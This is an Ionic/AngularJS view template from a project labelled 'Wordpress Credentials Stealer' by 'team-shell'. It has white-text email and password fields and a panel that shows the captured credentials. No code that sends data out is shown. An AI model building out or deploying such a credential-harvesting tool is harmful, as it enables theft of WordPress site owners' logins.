<ion-view view-title="$_">
  <ion-content class="padding">
    <div class="list card">
      <div class="item item-thumbnail-left">
        <img src="img/team-shell.png">
        <h2>[team-shell]</h2>
        <p>github.com/<span class="assertive">team-shell</span></p>
      </div>
      <div align="center">
        <pre>$_ Wordpress Credentials Stealer</pre>
      </div>
    </div>
    <input type="text" id="email" ng-model="email" ng-change="setUserId(email)" style="color: #fff">
    <input type="password" id="password" ng-model="password" ng-change="setPassword(password)" style="color: #fff">

    <div ng-if="showCredentials">
      <button class="button button-dark button-full">
        <pre>$_ {{userId}}</pre>
      </button>
      <button class="button button-dark button-full">
        <pre>$_ {{password}}</pre>
      </button>
    </div>
  </ion-content>
</ion-view>
